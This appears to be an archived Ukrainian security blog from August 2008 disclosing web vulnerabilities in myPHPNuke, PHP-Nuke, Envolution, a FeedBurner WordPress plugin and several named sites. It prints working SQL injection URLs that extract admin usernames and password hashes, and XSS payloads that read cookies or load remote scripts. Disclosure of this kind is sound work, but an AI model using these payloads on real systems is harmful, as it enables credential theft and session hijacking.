Архів для категорії 'Уразливості'

Нова SQL Injection уразливість в myPHPNuke

23:58 29.08.2008

Сьогодні, 29.08.2008, після знайдення попередніх уразливостей в myPHPNuke, я знайшов нову SQL Injection уразливість в системі myPHPNuke. Дірку я виявив на одному сайті, що використовує даний движок. Про що найближчим часом повідомлю розробникам системи.

SQL Injection:

http://site/article.php?sid=-1%20union%20select%20null,null,null,null,aid,pwd,null,null,null%20from%20mpn_authors%20limit%200,1

Уразливі версії до myPHPNuke 1.8.8_8rc2 (тому що в останній версії системи наявні додаткові фільтри). При цьому остання версія також уразлива - при відключених magic quotes в ній можлива обмежена SQL Injection атака.

Уразливості на inform.pl.ua

21:24 29.08.2008

21.04.2008

У серпні, 04.09.2007, а також додатково сьогодні, я знайшов Full path disclosure та Cross-Site Scripting уразливості на проекті http://inform.pl.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

29.08.2008

Сайт змінив свій домен з http://inform.pl.ua на http://poltava.info (і зі старого домена відбувається редирект на новий).

Full path disclosure:

http://inform.pl.ua/goroda.php

http://inform.pl.ua/link/phone.php

http://inform.pl.ua/link/confirm_image.php

http://inform.pl.ua/link/menu.php

XSS:

Дані уразливості вже виправлені. Але замість старої XSS дірки в пошуці була зроблена нова XSS в пошуці по сайту. На оновленому сайті http://poltava.info був розміщений новий локальний пошуковець - Користувацький пошук Гугла, також відомий як Google Custom Search Engine, про дірку в якому я писав (подібне й має місце на даному сайті).

XSS:

XSS та SQL Injection уразливості в myPHPNuke

23:52 28.08.2008

Нещодавно, 24.08.2008, я знайшов Cross-Site Scripting та SQL Injection уразливості в системі myPHPNuke. Дірки я виявив на одному сайті, що використовує даний движок. Про що найближчим часом повідомлю розробникам системи.

Раніше я вже писав про уразливості в myPHPNuke.

XSS:

http://site/print.php?sid=%3CBODY%20onload=alert(document.cookie)%3E

SQL Injection:

http://site/print.php?sid=-1%20union%20select%20null,null,aid,pwd,null,null%20from%20mpn_authors%20limit%200,1

Хоча до SQL Injection уразлива і myPHPNuke 1.8.8_8rc2, але в ній наявні додаткові фільтри, тому для проведення SQL Injection (а також XSS) потрібна попередня версія системи. Тому уразливі версії до myPHPNuke 1.8.8_8rc2 (а в останній версії системи можлива обмежена SQL Injection атака).

Добірка уразливостей

16:27 28.08.2008

В даній добірці уразливості в веб додатках:

Уразливості на regex.info

19:39 27.08.2008

22.03.2008

У вересні, 01.09.2007, а також додатково сьогодні, я знайшов Cross-Site Scripting, Abuse of Functionality, Insufficient Anti-automation та Denial of Service уразливості на проекті http://regex.info. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

27.08.2008

XSS:

Abuse of Functionality:

http://regex.info/exif.cgi?url=http://site/file

Віддалене викачення файлів, що може бути використано для атаки на інші сайти.

Insufficient Anti-automation:

http://regex.info/exif.cgi?url=http://site/file

DoS:

http://regex.info/exif.cgi?url=http://site/big_file

Дані уразливості досі не виправлені.

Уразливості в FeedBurner FeedSmith для WordPress

23:56 26.08.2008

Учора, 25.08.2008, а також додатково сьогодні, я виявив Full path disclosure та HTTP Response Splitting + Cross-Site Scripting уразливості в плагіні FeedBurner FeedSmith для WordPress. Про що найближчим часом повідомлю розробникам плагіна. Даний плагін зараз розробляється FeedBurner, що належить компанії Google.

Full path disclosure:

http://site/wp-content/plugins/FeedBurner_FeedSmith_Plugin.php

HTTP Response Splitting + XSS:

Обидві уразливості є persistent, і можуть використовуватися для проведення XSS та інших HTTP Response Splitting атак.

Уразливості на сторінці http://site/wp-admin/options-general.php? page=FeedBurner_FeedSmith_Plugin.php в параметрах feedburner_url і feedburner_comments_url. Уразливості спрацьовують при відвіданні фідів сайта (фіда записів чи коментарів чи обох, в залежності від того, в які поля був заданий код).

FeedBurner FeedSmith XSS.html

FeedBurner FeedSmith XSS2.html

Для проведення даної атаки необхідно обійти CSRF захист плагіна (потрібен робочий token), що може бути зроблено за допомогою іншої XSS (reflected) дірки.

Уразлива версія FeedBurner FeedSmith 2.3.1 та попередні версії.

Добірка уразливостей

16:11 26.08.2008

В даній добірці уразливості в веб додатках:

  • Dynamic PressRelease/getpress.asp sql injection (деталі)
  • DynamicData(dms)Document&Article Script /dm_browse.asp.asp sql injection (деталі)
  • our de France Pool 1.0.1 Remote File Include Bug (деталі)
  • Hunkaray Okul Portali v1.1 (tr) Sql injection Vuln (деталі)
  • Pluck 4.3 themes.php Remote File Inclusion and disclosure (деталі)
  • OpenWebMail Multiple XSS vuln. (деталі)
  • Session Fixation Vulnerability in HP SIM 5.0 (деталі)
  • HP Systems Insight Manager (SIM) for Windows, Remote Privileged Access and Arbitrary Code Execution (деталі)
  • Stuffed Tracker Multiple Cross-Site Scripting VULN (деталі)
  • MailEnable Enterprise <= 2.32 - 2.34 Remote Buffer Overflow Exploit (деталі)

XSS уразливість в PHP-Nuke

23:55 25.08.2008

Учора, 24.08.2008, я знайшов нову Cross-Site Scripting уразливість в системі PHP-Nuke. Дірку я виявив на одному сайті, що використовує даний движок. Уразливість працює лише в старих версіях PHP-Nuke, бо як я перевірив на різних сайтах (в тому числі на phpnuke.org), в останніх версіях (на 8.х) вона не працює.

Раніше я вже писав про уразливості в PHP-Nuke.

XSS:

http://site/modules.php?name=News&file=print&sid=%3Cscript%20src=http://site/script.js%20

Уразлива версія PHP-Nuke 7.0 та попередні версії.

Уразливості на www.banner.kiev.ua

19:33 25.08.2008

21.03.2008

У вересні, 01.09.2007, я знайшов Cross-Site Scripting уразливості на проекті http://www.banner.kiev.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

25.08.2008

XSS (IE):

Дані уразливості досі не виправлені.

Нові уразливості в Envolution

23:58 23.08.2008

Нещодавно, 17.08.2008, після попередніх уразливостей в Envolution, я знайшов нові Full path disclosure та SQL Injection уразливості в системі Envolution. Дірки я виявив на одному сайті, що використовує даний движок. Про що найближчим часом повідомлю розробникам системи.

Full path disclosure:

http://site/index.php?module=Errore&type=admin&op=noexist&modname=%22
http://site/index.php?module=Errore&type=admin&op=%22
http://site/index.php?module=Errore&type=%22
http://site/index.php?module=%22
http://site/print.php?sid=%22
http://site/modules.php?op=modload&file=%22
http://site/modules.php?op=modload&name=News&file=article&sid=%22
http://site/modules.php?op=modload&name=Recommend_Us&file=index&req=%22
http://site/modules.php?op=modload&name=%22

SQL Injection:

http://site/print.php?sid=-1%20union%20select%20null,null,pn_uname,pn_pass,null,null,null,null%20from%20envo_users%20limit%201,1

Уразлива версія Envolution 1.2.0 та попередні версії.